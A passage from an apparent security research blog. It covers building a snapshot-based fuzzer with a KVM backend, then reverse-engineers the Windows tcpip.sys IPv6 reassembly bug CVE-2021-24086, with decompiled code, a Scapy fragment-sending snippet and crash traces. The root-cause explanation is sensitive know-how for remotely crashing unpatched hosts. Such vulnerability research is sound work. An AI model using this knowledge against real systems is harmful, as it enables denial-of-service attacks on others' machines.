Gpa_t(PdBase + GuestAddress.PdIndex * 8); const MMPTE_HARDWARE Pde = PhysRead8(PdeGpa); if (!Pde.Present) { TranslationResult.ResultCode = WHvTranslateGvaResultPageNotPresent; return S_OK; } // // large pages: // 7 (PS) - Page size; must be 1 (otherwise, this entry references a page // table; see Table 4-18 // const uint64_t PtBase = Pde.PageFrameNumber * Page::Size; if (Pde.LargePage) { TranslationResult.ResultCode = WHvTranslateGvaResultSuccess; Gpa = Gpa_t(PtBase + (Gva.U64() & 0x1f'ffff)); return S_OK; } const Gpa_t PteGpa = Gpa_t(PtBase + GuestAddress.PtIndex * 8); const MMPTE_HARDWARE Pte = PhysRead8(PteGpa); if (!Pte.Present) { TranslationResult.ResultCode = 
WHvTranslateGvaResultPageNotPresent; return S_OK; } TranslationResult.ResultCode = WHvTranslateGvaResultSuccess; const uint64_t PageBase = Pte.PageFrameNumber * 0x1000; Gpa = Gpa_t(PageBase + GuestAddress.Offset); return S_OK; }  Collecting dividends Comparing the two backends, whv showed about 15x better performance over bochscpu. I honestly was a bit disappointed as I expected more of a 100x performance increase but I guess it was still a significant perf increase: bochscpu: #1 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 0.0s crash: 0 timeout: 0 cr3: 0 #2 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 12.0s crash: 0 timeout: 0 cr3: 0 #3 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 25.0s crash: 0 timeout: 0 cr3: 0 #4 cov: 260546 corp: 0 exec/s: 0.1 lastcov: 38.0s crash: 0 timeout: 0 cr3: 0 whv: #12 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 6.0s crash: 0 timeout: 0 cr3: 0 #30 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 16.0s crash: 0 timeout: 0 cr3: 0 #48 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 27.0s crash: 0 timeout: 0 cr3: 0 #66 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 37.0s crash: 0 timeout: 0 cr3: 0 #84 cov: 25521 corp: 0 exec/s: 1.5 lastcov: 47.0s crash: 0 timeout: 0 cr3: 0  The speed started to be good enough for me to run it overnight and discover my first few crashes which was exciting even though they were just interr. 2 fast 2 furious: KVM backend I really wanted to start fuzzing IDA on some proper hardware. It was pretty clear that renting Windows machines in the cloud with nested virtualization enabled wasn't something widespread or cheap. On top of that, I was still disappointed by the performance of whv and so I was eager to see how battle-tested hypervisors like Xen or KVM would measure. I didn't know anything about those VMM but I quickly discovered that KVM was available in the Linux kernel and that it exposed a user-mode API that resembled whv via /dev/kvm. This looked perfect because if it was similar enough to whv I could probably write a backend for it easily. 
The KVM API powers Firecracker, a project that creates micro VMs to run various workloads in the cloud. I assumed that you would need rich features as well as good performance to be the foundation technology of such a project.

KVM APIs work very similarly to whv and as a result, I will not repeat the previous part. Instead, I will just walk you through some of the differences and the things I enjoyed more with KVM.

GPRs available through shared-memory

To avoid sending an IOCTL every time you want the value of a guest GPR, KVM allows you to map a memory region shared with the kernel where the registers are laid out:

//
// Get the size of the shared kvm run structure.
//
VpMmapSize_ = ioctl(Kvm_, KVM_GET_VCPU_MMAP_SIZE, 0);
if (VpMmapSize_ < 0) {
  perror("Could not get the size of the shared memory region.");
  return false;
}
//
// Man says:
// there is an implicit parameter block that can be obtained by mmap()'ing
// the vcpu fd at offset 0, with the size given by KVM_GET_VCPU_MMAP_SIZE.
//
Run_ = (struct kvm_run *)mmap(nullptr, VpMmapSize_, PROT_READ | PROT_WRITE,
                              MAP_SHARED, Vp_, 0);
// mmap reports failure with MAP_FAILED, not with a null pointer.
if (Run_ == MAP_FAILED) {
  perror("mmap VCPU_MMAP_SIZE");
  return false;
}


On-demand paging

Implementing on-demand paging with KVM was very easy. It uses userfaultfd and so you can just start a thread that polls and services the requests:

void KvmBackend_t::UffdThreadMain() {
  while (!UffdThreadStop_) {
    //
    // Set up the poll fd with the uffd fd.
    //
    struct pollfd PoolFd = {.fd = Uffd_, .events = POLLIN};
    int Res = poll(&PoolFd, 1, 6000);
    if (Res < 0) {
      //
      // Sometimes poll returns -EINTR when we are trying to kick off the CPU
      // out of KVM_RUN.
      //
      if (errno == EINTR) {
        fmt::print("Poll returned EINTR\n");
        continue;
      }
      perror("poll");
      exit(EXIT_FAILURE);
    }
    //
    // This is the timeout, so we loop around to have a chance to check for
    // UffdThreadStop_.
    //
    if (Res == 0) {
      continue;
    }
    //
    // You get the address of the access that triggered the missing page event
    // out of a struct uffd_msg that you read in the thread from the uffd. You
    // can supply as many pages as you want with UFFDIO_COPY or UFFDIO_ZEROPAGE.
    // Keep in mind that unless you used DONTWAKE then the first of any of those
    // IOCTLs wakes up the faulting thread.
    //
    struct uffd_msg UffdMsg;
    Res = read(Uffd_, &UffdMsg, sizeof(UffdMsg));
    if (Res < 0) {
      perror("read");
      exit(EXIT_FAILURE);
    }
    //
    // Let's ensure we are dealing with what we think we are dealing with.
    //
    if (Res != sizeof(UffdMsg) || UffdMsg.event != UFFD_EVENT_PAGEFAULT) {
      fmt::print("The uffdmsg or the type of event we received is unexpected, "
                 "bailing.");
      exit(EXIT_FAILURE);
    }
    //
    // Grab the HVA off the message.
    //
    const uint64_t Hva = UffdMsg.arg.pagefault.address;
    //
    // Compute the GPA from the HVA.
    //
    const Gpa_t Gpa = Gpa_t(Hva - uint64_t(Ram_.Hva()));
    //
    // Page it in.
    //
    RunStats_.UffdPages++;
    const uint8_t *Src = Ram_.GetHvaFromDump(Gpa);
    if (Src != nullptr) {
      const struct uffdio_copy UffdioCopy = {
          .dst = Hva,
          .src = uint64_t(Src),
          .len = Page::Size,
      };
      //
      // The primary ioctl to resolve userfaults is UFFDIO_COPY. That atomically
      // copies a page into the userfault registered range and wakes up the
      // blocked userfaults (unless uffdio_copy.mode & UFFDIO_COPY_MODE_DONTWAKE
      // is set). Other ioctl works similarly to UFFDIO_COPY. They’re atomic as
      // in guaranteeing that nothing can see an half copied page since it’ll
      // keep userfaulting until the copy has finished.
      //
      Res = ioctl(Uffd_, UFFDIO_COPY, &UffdioCopy);
      if (Res < 0) {
        perror("UFFDIO_COPY");
        exit(EXIT_FAILURE);
      }
    } else {
      const struct uffdio_zeropage UffdioZeroPage = {
          .range = {.start = Hva, .len = Page::Size}};
      Res = ioctl(Uffd_, UFFDIO_ZEROPAGE, &UffdioZeroPage);
      if (Res < 0) {
        perror("UFFDIO_ZEROPAGE");
        exit(EXIT_FAILURE);
      }
    }
  }
}


Timeout

Another cool thing is that KVM exposes the Performance Monitoring Unit to the guests if the hardware supports it. When it does, I am able to program the PMU to trigger an interrupt after an arbitrary number of retired instructions. This is useful because when MSR_IA32_FIXED_CTR0 overflows, it triggers a special interrupt called a PMI that gets delivered via vector 0xFE of the CPU's IDT. To catch it, we simply break on hal!HalpPerfInterrupt:

//
// This is to catch the PMI interrupt if performance counters are used to
// bound execution.
//
if (!g_Backend->SetBreakpoint("hal!HalpPerfInterrupt",
                              [](Backend_t *Backend) {
                                CrashDetectionPrint("Perf interrupt\n");
                                Backend->Stop(Timedout_t());
                              })) {
  fmt::print("Could not set a breakpoint on hal!HalpPerfInterrupt, but "
             "carrying on..\n");
}


To make it work you have to program the APIC a little bit and I remember struggling to get the interrupt to fire. I am still not 100% sure that I got the details fully right but the interrupt triggered consistently during my tests and so I called it a day. I would also like to revisit this area in the future as there might be other features I could use for the fuzzer.

Problem 9: Running it in the cloud

The KVM backend development was done on a laptop in a Hyper-V VM with nested virtualization on. It worked great but it was not powerful and so I wanted to run it on real hardware. After shopping around, I realized that Amazon didn't have any offers that supported nested virtualization and that only Microsoft's Azure had available SKUs with nested virtualization on. I rented one of them to try it out and the hardware didn't support a VMX feature called unrestricted_guest. I can't quite remember why it mattered but it had to do with real mode & the APIC and the way I create memory slots. I had developed the backend assuming this feature would be there and so I didn't use Azure either. Instead, I rented a bare-metal server on Vultr for about $100 / mo. The CPU was a Xeon E3-1270v6 processor, 4 cores, 8 threads @ 3.8GHz, which seemed good enough for my usage. The hardware had a PMU and that is where I developed the support for it in wtf as well.

I was pretty happy because the fuzzer was running about 10x faster than whv. It is not a fair comparison because those numbers weren't acquired from the same hardware but still:

#123 cov: 25521 corp: 0 exec/s: 12.3 lastcov: 9.0s crash: 0 timeout: 0 cr3: 0
#252 cov: 25521 corp: 0 exec/s: 12.5 lastcov: 19.0s crash: 0 timeout: 0 cr3: 0
#381 cov: 25521 corp: 0 exec/s: 12.5 lastcov: 29.0s crash: 0 timeout: 0 cr3: 0
#510 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 39.0s crash: 0 timeout: 0 cr3: 0
#639 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 49.0s crash: 0 timeout: 0 cr3: 0
#768 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 59.0s crash: 0 timeout: 0 cr3: 0
#897 cov: 25521 corp: 0 exec/s: 12.6 lastcov: 1.1min crash: 0 timeout: 0 cr3: 0


To give you more details, this test case generated executions of around 195 million instructions with the following stats (generated by bochscpu):

Run stats:
Instructions executed: 194593453 (260546 unique)
Dirty pages: 9166848 bytes (0 MB)
Memory accesses: 411196757 bytes (24 MB)
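
To put the dirty pages figure in perspective, the sketch below converts it into a page count, assuming regular 4 KiB pages (the helper name BytesToPages is made up for this example). Under that assumption, 9166848 bytes is 2238 pages that need to be restored after running this test case.

```cpp
#include <cstdint>

// Size of a regular x64 page in bytes (assumption: no large pages involved).
constexpr uint64_t PageSize = 0x1000;

// Number of pages needed to back `Bytes` bytes, rounding up.
constexpr uint64_t BytesToPages(const uint64_t Bytes) {
  return (Bytes + PageSize - 1) / PageSize;
}

// The dirty pages figure from the run stats above.
static_assert(BytesToPages(9166848) == 2238, "unexpected page count");
```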


Problem 10: Minsetting a corpus of 1.6 million files

In parallel with coding wtf, I acquired a fairly large corpus made of the weirdest ELFs possible. This corpus contained 1.6 million ELF files and I now needed to minset it. Because of the way I had architected wtf, minsetting was a serial process. I could have gone the AFL route and generated execution traces that eventually get merged together but I didn't like this idea either.

Instead, I re-architected wtf into a client and a server. The server owns the coverage, the corpus, and the mutator. It just distributes test cases to clients and receives code coverage reports from them. You can see the clients as runners that send back results to the server. All the important state is kept in the server.
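
The server side of this model can be sketched as follows. This is a simplified, hypothetical model (the names Server_t and HandleResult are made up and the networking is left out), not wtf's actual code: the server keeps the aggregated coverage and only adds a test case to the corpus when a client reports at least one address that has never been seen before, which is also what minsetting boils down to.

```cpp
#include <cstddef>
#include <cstdint>
#include <string>
#include <unordered_set>
#include <vector>

// Hypothetical, simplified model of the server: it owns the aggregated
// coverage and the corpus; clients only report what they observed.
class Server_t {
  std::unordered_set<uint64_t> Coverage_;
  std::vector<std::string> Corpus_;

public:
  // Merges the coverage a client reported for a test case. The test case is
  // kept in the corpus only if it hit at least one new address.
  bool HandleResult(const std::string &Testcase,
                    const std::vector<uint64_t> &Reported) {
    bool NewCoverage = false;
    for (const uint64_t Address : Reported) {
      // insert() tells us whether the address was already known.
      if (Coverage_.insert(Address).second) {
        NewCoverage = true;
      }
    }
    if (NewCoverage) {
      Corpus_.push_back(Testcase);
    }
    return NewCoverage;
  }

  size_t CoverageSize() const { return Coverage_.size(); }
  size_t CorpusSize() const { return Corpus_.size(); }
};
```

Because the clients hold no state in this sketch, adding more of them only increases the rate at which HandleResult gets called.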

This model was nice because it automatically meant that I could fully utilize the hardware I was renting to minset those files. As an example, minsetting this corpus of files with a single core would have probably taken weeks to complete but it took 8 hours with this new architecture:

#1972714 cov: 74065 corp: 3176 (58mb) exec/s: 64.2 (8 nodes) lastcov: 3.0s crash: 49 timeout: 71 cr3: 48 uptime: 8hr


Wrapping up

In this post we went through the birth of wtf which is a distributed, code-coverage guided, customizable, cross-platform snapshot-based fuzzer designed for attacking user and/or kernel-mode targets running on Microsoft Windows. It also led to writing and open-sourcing a number of other small projects: lockmem, inject, kdmp-parser and symbolizer.

We went from zero to dozens of unique crashes in various IDA components: libdwarf64.dll, dwarf64.dll, elf64.dll and pdb64.dll. The findings were really diverse: null dereferences, stack overflows, divisions by zero, infinite loops, use-after-frees, and out-of-bounds accesses. I have compiled all of my findings in the following GitHub repository: fuzzing-ida75.

I probably fuzzed for an entire month but most of the crashes popped up in the first two weeks. According to lighthouse, I managed to cover about 80% of elf64.dll, 50% of dwarf64.dll and 26% of libdwarf64.dll with a minset of about 2.4k files for a total of 17MB.

Before signing out, I wanted to thank the IDA Hex-Rays team for handling & fixing my reports at an amazing speed. I would highly recommend for you to try out their bounty as I am sure there's a lot to be found.

Reverse-engineering tcpip.sys: mechanics of a packet of the death (CVE-2021-24086)

15 April 2021 at 15:00

Introduction

Since the beginning of my journey in computer security I have always been amazed and fascinated by true remote vulnerabilities. By true remotes, I mean bugs that are triggerable remotely without any user interaction. Not even a single click. As a result I am always on the lookout for such vulnerabilities.

On the Tuesday 13th of October 2020, Microsoft released a patch for CVE-2020-16898 which is a vulnerability affecting Windows' tcpip.sys kernel-mode driver dubbed Bad neighbor. Here is the description from Microsoft:

A remote code execution vulnerability exists when the Windows TCP/IP stack improperly
handles ICMPv6 Router Advertisement packets. An attacker who successfully exploited this vulnerability could gain
the ability to execute code on the target server or client. To exploit this vulnerability, an attacker would have
to send specially crafted ICMPv6 Router Advertisement packets to a remote Windows computer.


The vulnerability really did stand out to me: remote vulnerabilities affecting TCP/IP stacks seemed extinct and being able to remotely trigger a memory corruption in the Windows kernel is very interesting for an attacker. Fascinating.

Not having diffed Microsoft patches in years, I figured it would be a fun exercise to go through. I knew that I wouldn't be the only one working on it as those unicorns get a lot of attention from internet hackers. Indeed, my friend pi3 was so fast to diff the patch, write a PoC and write a blogpost that I didn't even have time to start, oh well :)

That is why when Microsoft blogged about another set of vulnerabilities being fixed in tcpip.sys I figured I might be able to work on those this time. Again, I knew for a fact that I wouldn't be the only one racing to write the first public PoC for CVE-2021-24086 but somehow the internet stayed silent long enough for me to complete this task which is very surprising :)

In this blogpost I will take you on my journey from zero to BSoD. From diffing the patches, reverse-engineering tcpip.sys and fighting our way through writing a PoC for CVE-2021-24086. If you came here for the code, fair enough, it is available on my github: 0vercl0k/CVE-2021-24086.

TL;DR

For the readers that want to get the scoop, CVE-2021-24086 is a NULL dereference in tcpip!Ipv6pReassembleDatagram that can be triggered remotely by sending a series of specially crafted packets. The issue happens because of the way the code treats the network buffer:

void Ipv6pReassembleDatagram(Packet_t *Packet, Reassembly_t *Reassembly, char OldIrql)
{
  // ...
  const uint32_t UnfragmentableLength = Reassembly->UnfragmentableLength;
  const uint32_t TotalLength = UnfragmentableLength + Reassembly->DataLength;
  const uint32_t HeaderAndOptionsLength = UnfragmentableLength + sizeof(ipv6_header_t);
  // ...
  NetBufferList = (_NET_BUFFER_LIST *)NetioAllocateAndReferenceNetBufferAndNetBufferList(
                                        IppReassemblyNetBufferListsComplete,
                                        Reassembly,
                                        0,
                                        0,
                                        0,
                                        0);
  if ( !NetBufferList )
  {
    // ...
    goto Bail_0;
  }

  FirstNetBuffer = NetBufferList->FirstNetBuffer;
  if ( NetioRetreatNetBuffer(FirstNetBuffer, uint16_t(HeaderAndOptionsLength), 0) < 0 )
  {
    // ...
    goto Bail_1;
  }

  Buffer = (ipv6_header_t *)NdisGetDataBuffer(FirstNetBuffer, HeaderAndOptionsLength, 0, 1, 0);

  //...
  *Buffer = Reassembly->Ipv6;


A fresh NetBufferList (abbreviated NBL) is allocated by NetioAllocateAndReferenceNetBufferAndNetBufferList and NetioRetreatNetBuffer allocates a Memory Descriptor List (abbreviated MDL) of uint16_t(HeaderAndOptionsLength) bytes. This integer truncation from uint32_t is important.

Once the network buffer has been allocated, NdisGetDataBuffer is called to gain access to a contiguous block of data from the fresh network buffer. This time though, HeaderAndOptionsLength is not truncated which allows an attacker to trigger a special condition in NdisGetDataBuffer to make it fail. This condition is hit when uint16_t(HeaderAndOptionsLength) != HeaderAndOptionsLength. When the function fails, it returns NULL and Ipv6pReassembleDatagram blindly trusts this pointer and does a memory write, bugchecking the machine. To pull this off, you need to trick the network stack into receiving an IPv6 fragment with a very large amount of headers. Here is what the bugchecks look like:

KDTARGET: Refreshing KD connection

*** Fatal System Error: 0x000000d1
(0x0000000000000000,0x0000000000000002,0x0000000000000001,0xFFFFF8054A5CDEBB)

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!DbgBreakPointWithStatus:
fffff805473c46a0 cc              int     3

kd> kc
# Call Site
00 nt!DbgBreakPointWithStatus
01 nt!KiBugCheckDebugBreak
02 nt!KeBugCheck2
03 nt!KeBugCheckEx
04 nt!KiBugCheckDispatch
05 nt!KiPageFault
06 tcpip!Ipv6pReassembleDatagram
0e nt!KeExpandKernelStackAndCalloutInternal
0f nt!KeExpandKernelStackAndCalloutEx
11 NDIS!ndisMIndicateNetBufferListsToOpen


For anybody else in for a long ride, let's get to it :)

Recon

Even though Francisco Falcon already wrote a cool blogpost discussing his work on this case, I have decided to also write up mine; I'll try to cover aspects that are less or not covered in his post like tcpip.sys internals for example.

All right, let's start by the beginning: at this point I don't know anything about tcpip.sys and I don't know anything about the bugs getting patched. Microsoft's blogpost is helpful because it gives us a bunch of clues:

• There are three different vulnerabilities that seemed to involve fragmentation in IPv4 & IPv6,
• Two of them are rated as Remote Code Execution which means that they cause memory corruption somehow,
• One of them causes a DoS which means somehow it likely bugchecks the target.

According to this tweet we also learn that those flaws have been internally found by Microsoft's own @piazzt which is awesome.

Googling around also reveals a bunch more useful information, since it would seem that Microsoft privately shared PoCs with their partners via the MAPP program.

At this point I decided to focus on the DoS vulnerability (CVE-2021-24086) as a first step. I figured it might be easier to trigger and that I might be able to use the knowledge acquired while triggering it to better understand tcpip.sys and maybe work on the other ones if time and motivation allow.

The next logical step is to diff the patches to identify the fixes.

Diffing Microsoft patches in 2021

I honestly can't remember the last time I diff'd Microsoft patches. Probably Windows XP / Windows 7 time to be honest. Since then, a lot has changed though. The security updates are now cumulative, which means that packages embed every fix known to date. You can grab packages directly from the Microsoft Update Catalog which is handy. Last but not least, Windows Updates now use forward / reverse differentials; you can read this to know more about what it means.

Extracting and Diffing Windows Patches in 2020 is a great blog post that talks about how to unpack the patches off an update package and how to apply the differentials. The output of this work is basically the tcpip.sys binary before and after the update. If you don't feel like doing this yourself, I've uploaded the two binaries (as well as their respective public PDBs) that you can use to do the diffing yourself: 0vercl0k/CVE-2021-24086/binaries. Also, I have been made aware after publishing this post about the amazing winbindex website which indexes Windows binaries and lets you download them in a click. Here is the index available for tcpip.sys as an example.

Once we have the before and after binaries, a little dance with IDA and the good ol’ BinDiff yields the below:

There aren't a whole lot of changes to look at which is nice, and focusing on Ipv6pReassembleDatagram feels right. Microsoft's workaround mentioned disabling packet reassembly (netsh int ipv6 set global reassemblylimit=0) and this function seems to be reassembling datagrams; close enough right?

After looking at it for a little time, the patched binary introduced this new interesting looking basic block:

It ends with what looks like a comparison with the 0xffff integer and a conditional jump that either bails out or keeps going. This looks very interesting because some articles mentioned that the bug could be triggered with a packet containing a large amount of headers. Not that you should trust those types of news articles as they are usually not technically accurate and sensationalized, but there might be some truth to it. At this point, I felt pretty good about it and decided to stop diffing and start reverse-engineering. I assumed the issue would be some sort of integer overflow / truncation that would be easy to trigger based on the name of the function. We just need to send a big packet right?

Reverse-engineering tcpip.sys

This is where the real journey begins, along with the usual emotional rollercoaster that comes with studying vulnerabilities. I initially thought I would be done with this in a few days, or a week. Oh boy, I was wrong though.

Baby steps

First thing I did was to prepare a lab environment. I installed a Windows 10 VM (target) and a Linux VM (attacker), set up KDNet and kernel debugging to debug the target, installed Wireshark / Scapy (v2.4.4), and created a virtual switch that the two VMs share. And... finally loaded tcpip.sys in IDA. The module looked pretty big and complex at first sight - no big surprise there; it implements Windows' IPv4 & IPv6 network stack after all. I started the adventure by focusing first on Ipv6pReassembleDatagram. Here is the piece of assembly code that we saw earlier in BinDiff and that looked interesting:

Great, that's a start. Before going deep down the rabbit hole of reverse-engineering, I decided to try to hit the function and be able to debug it with WinDbg. As the function name suggests reassembly I wrote the following code and threw it against my target:

from scapy.all import *

pkt = Ether() / IPv6(dst = 'ff02::1') / UDP() / ('a' * 0x1000)
sendp(fragment6(pkt, 500), iface = 'eth1')


This successfully triggers the breakpoint in WinDbg; neat:

kd> g
Breakpoint 0 hit
tcpip!Ipv6pReassembleDatagram:
fffff8022edcdd6c 4488442418      mov     byte ptr [rsp+18h],r8b

kd> kc
# Call Site
00 tcpip!Ipv6pReassembleDatagram
08 nt!KeExpandKernelStackAndCalloutInternal
09 nt!KeExpandKernelStackAndCalloutEx


We can even observe the fragmented packets in Wireshark which is also pretty cool:

For those that are not familiar with packet fragmentation, it is a mechanism used to chop large packets (larger than the Maximum Transmission Unit) in smaller chunks to be able to be sent across network equipment. The receiving network stack has the burden to stitch them all together in a safe manner (winkwink).

All right, perfect. We have now what I consider a good enough research environment and we can start digging deep into the code. At this point, let's not focus on the vulnerability yet but instead try to understand how the code works, the type of arguments it receives, recover structures and the semantics of important fields, etc. Let's get our HexRays decompilation output pretty.

As you might imagine, this is the part that's the most time consuming. I use a mixture of bottom-up, top-down. Loads of experiments. Commenting the decompiled code as best as I can, challenging myself by asking questions, answering them, rinse & repeat.

High level overview

Oftentimes, studying code / features in isolation in complex systems is not enough; it only takes you so far. Complex drivers like tcpip.sys are gigantic, carry a lot of state, and are hard to reason about, both in terms of execution and data flow. In this case, there is this sort of size integer, that seems to be related to something that got received and we want to set that to 0xffff. Unfortunately, just focusing on Ipv6pReassembleDatagram and Ipv6pReceiveFragment was not enough for me to make significant progress. It was worth a try though but time to switch gears.

Zooming out

All right, that's cool, our HexRays decompiled code is getting prettier and prettier; it feels rewarding. We have abused the create new structure feature to lift a bunch of structures. We guessed about the semantics of some of them but most are still unknown. So yeah, let's work smarter.

We know that tcpip.sys receives packets from the network; we don't know exactly how or where from but maybe we don't need to know that much. One of the first questions you might ask yourself is how the kernel stores network data? What structures does it use?

NET_BUFFER & NET_BUFFER_LIST

If you have some Windows kernel experience, you might be familiar with NDIS and you might also have heard about some of the APIs and the structures it exposes to users. It is documented because third-parties can develop extensions and drivers to interact with the network stack at various points.

An important structure in this world is NET_BUFFER. This is what it looks like in WinDbg:

kd> dt NDIS!_NET_BUFFER
NDIS!_NET_BUFFER
+0x000 Next             : Ptr64 _NET_BUFFER
+0x008 CurrentMdl       : Ptr64 _MDL
+0x010 CurrentMdlOffset : Uint4B
+0x018 DataLength       : Uint4B
+0x018 stDataLength     : Uint8B
+0x020 MdlChain         : Ptr64 _MDL
+0x028 DataOffset       : Uint4B
+0x030 ChecksumBias     : Uint2B
+0x032 Reserved         : Uint2B
+0x038 NdisPoolHandle   : Ptr64 Void
+0x040 NdisReserved     : [2] Ptr64 Void
+0x050 ProtocolReserved : [6] Ptr64 Void
+0x080 MiniportReserved : [4] Ptr64 Void
+0x0a8 SharedMemoryInfo : Ptr64 _NET_BUFFER_SHARED_MEMORY
+0x0a8 ScatterGatherList : Ptr64 _SCATTER_GATHER_LIST


It can look overwhelming but we don't need to understand every detail. What is important is that the network data is stored in a regular MDL. Like MDLs, NET_BUFFERs can be chained together, which allows the kernel to store a large amount of data in a bunch of non-contiguous chunks of physical memory; virtual memory is the magic wand used to make the data look contiguous. For the readers that are not familiar with Windows kernel development, an MDL is a Windows kernel construct that allows users to map physical memory in a contiguous virtual memory region. Every MDL is actually followed by a list of PFNs (which don't need to be contiguous) that the Windows kernel is able to map in a contiguous virtual memory region; magic.

kd> dt nt!_MDL
+0x000 Next             : Ptr64 _MDL
+0x008 Size             : Int2B
+0x00a MdlFlags         : Int2B
+0x00c AllocationProcessorNumber : Uint2B
+0x00e Reserved         : Uint2B
+0x010 Process          : Ptr64 _EPROCESS
+0x018 MappedSystemVa   : Ptr64 Void
+0x020 StartVa          : Ptr64 Void
+0x028 ByteCount        : Uint4B
+0x02c ByteOffset       : Uint4B
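
To make the chaining idea concrete, here is a small Python model of a chain of chunks that is read as if it were one contiguous range. It is only a sketch of the concept: `Chunk` and `read_contiguous` are names I made up, and nothing here mirrors the real NDIS structures beyond the notion of a `Next` pointer and a byte count per element.

```python
# Toy model of an MDL-like chain: non-contiguous chunks exposed as one
# contiguous byte range. Names are illustrative, not the NDIS API.
class Chunk:
    def __init__(self, data, nxt=None):
        self.data = data
        self.next = nxt


def read_contiguous(first, offset, length):
    '''Return `length` bytes starting at `offset`, walking the chain,
    or None if the chain does not hold enough data.'''
    out = bytearray()
    chunk = first
    while chunk is not None and len(out) < length:
        if offset >= len(chunk.data):
            # The requested range starts in a later chunk.
            offset -= len(chunk.data)
        else:
            out += chunk.data[offset : offset + length - len(out)]
            offset = 0
        chunk = chunk.next
    return bytes(out) if len(out) == length else None


chain = Chunk(b'AAAA', Chunk(b'BB', Chunk(b'CCCCCC')))
print(read_contiguous(chain, 2, 6))
```

Note how a request that is larger than what the chain holds yields `None`; keep that behavior in mind, a very similar failure mode matters later in this post.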


A NET_BUFFER_LIST is basically a structure that keeps track of a list of NET_BUFFERs, as the name suggests:

kd> dt NDIS!_NET_BUFFER_LIST
+0x000 Next             : Ptr64 _NET_BUFFER_LIST
+0x008 FirstNetBuffer   : Ptr64 _NET_BUFFER
+0x010 Context          : Ptr64 _NET_BUFFER_LIST_CONTEXT
+0x018 ParentNetBufferList : Ptr64 _NET_BUFFER_LIST
+0x020 NdisPoolHandle   : Ptr64 Void
+0x030 NdisReserved     : [2] Ptr64 Void
+0x040 ProtocolReserved : [4] Ptr64 Void
+0x060 MiniportReserved : [2] Ptr64 Void
+0x070 Scratch          : Ptr64 Void
+0x078 SourceHandle     : Ptr64 Void
+0x080 NblFlags         : Uint4B
+0x084 ChildRefCount    : Int4B
+0x088 Flags            : Uint4B
+0x08c Status           : Int4B
+0x08c NdisReserved2    : Uint4B
+0x090 NetBufferListInfo : [29] Ptr64 Void


Again, no need to understand every detail, thinking in concepts is good enough. On top of that, Microsoft makes our life easier by providing a very useful WinDbg extension called ndiskd. It exposes two functions to dump NET_BUFFER and NET_BUFFER_LIST: !ndiskd.nb and !ndiskd.nbl respectively. These are a big time saver because they'll take care of walking the various levels of indirection: list of NET_BUFFERs and chains of MDLs.

The mechanics of parsing an IPv6 packet

Now that we know where and how network data is stored, we can ask ourselves how IPv6 packet parsing works? I have very little knowledge about networking, but I know that there are various headers that need to be parsed differently and that they can chain together. The layer N tells you what you'll find next.

What I am about to describe is what I have figured out while reverse-engineering as well as what I have observed while debugging it through bazillions of experiments. Full disclosure: I am no expert so take it with a grain of salt :)

The top level function of interest is IppReceiveHeaderBatch. The first thing it does is to invoke IppReceiveHeadersHelper on every packet in the list:

  if ( Packet )
  {
    do
    {
      Next = Packet->Next;
      Packet->Next = 0;
      IppReceiveHeadersHelper(Packet, Protocol, ...);
      Packet = Next;
    }
    while ( Next );
  }


Packet_t is an undocumented structure that is associated with received packets. A bunch of state is stored in this structure and figuring out the semantics of important fields is time consuming. IppReceiveHeadersHelper's main role is to kick off the parsing machine. It parses the IPv6 (or IPv4) header of the packet and reads the next_header field. As I mentioned above, this field is very important because it indicates how to read the next layer of the packet. This value is kept in the Packet structure, and a bunch of functions reads and updates it during parsing.

  NetBufferList = Packet->NetBufferList;
  FirstNetBuffer = NetBufferList->FirstNetBuffer;
  CurrentMdl = FirstNetBuffer->CurrentMdl;
  if ( (CurrentMdl->MdlFlags & 5) != 0 )
    Va = CurrentMdl->MappedSystemVa;
  else
    Va = MmMapLockedPagesSpecifyCache(CurrentMdl, 0, MmCached, 0, 0, 0x40000000u);
  IpHdr = (ipv6_header_t *)((char *)Va + FirstNetBuffer->CurrentMdlOffset);
  if ( Protocol == (Protocol_t *)Ipv4Global )
  {
    // ...
  }
  else
  {
    // Keep track of the next header in the Packet structure.
    Packet->NextHeader = IpHdr->next_header;
    // ...
  }
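
For readers who have never looked at the wire format, here is a minimal Python sketch of what reading next_header off the fixed IPv6 header amounts to. It follows the standard 40-byte header layout; `parse_ipv6_header` and the dictionary keys are names I picked for the example, they are not taken from the driver.

```python
import struct

def parse_ipv6_header(raw):
    '''Parse the 40-byte fixed IPv6 header.'''
    if len(raw) < 40:
        raise ValueError('truncated IPv6 header')
    # 4 bytes of version / traffic class / flow label, then the payload
    # length, the next header (at offset 6) and the hop limit.
    vtf, payload_len, next_header, hop_limit = struct.unpack('!IHBB', raw[:8])
    return {
        'version': vtf >> 28,
        'payload_len': payload_len,
        'next_header': next_header,
        'hop_limit': hop_limit,
        'src': raw[8:24],
        'dst': raw[24:40],
    }

# Hand-built header: version 6, 8 bytes of payload, next header 44 (fragment).
hdr = struct.pack('!IHBB', 6 << 28, 8, 44, 64) + bytes(16) + bytes(16)
info = parse_ipv6_header(hdr)
print(info['version'], info['next_header'])
```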


The function does a lot more; it initializes several Packet_t fields but let's ignore that for now to avoid getting overwhelmed by complexity. Once the function returns back in IppReceiveHeaderBatch, it extracts a demuxer off the Protocol_t structure and invokes a parsing callback if the NextHeader is a valid extension header. The Protocol_t structure holds an array of Demuxer_t (term used in the driver).

struct Demuxer_t
{
  void (__fastcall *Parse)(Packet_t *);
  void *f0;
  void *f1;
  void *Size;
  void *f3;
  _BYTE IsExtensionHeader;
  _BYTE gap[23];
};

struct Protocol_t
{
  // ...
  Demuxer_t Demuxers[277];
};


NextHeader (populated earlier in IppReceiveHeaderBatch) is the value used to index into this array.

If the demuxer is handling an extension header, then a callback is invoked to parse the header properly. This happens in a loop until the parsing hits the first part of the packet that isn't a header in which case it handles the next packet.

  while ( ... )
  {
    NetBufferList = RcvList->NetBufferList;
    IpProto = RcvList->NextHeader;
    if ( ... )
    {
      Demuxer = (Demuxer_t *)IpUdpEspDemux;
    }
    else
    {
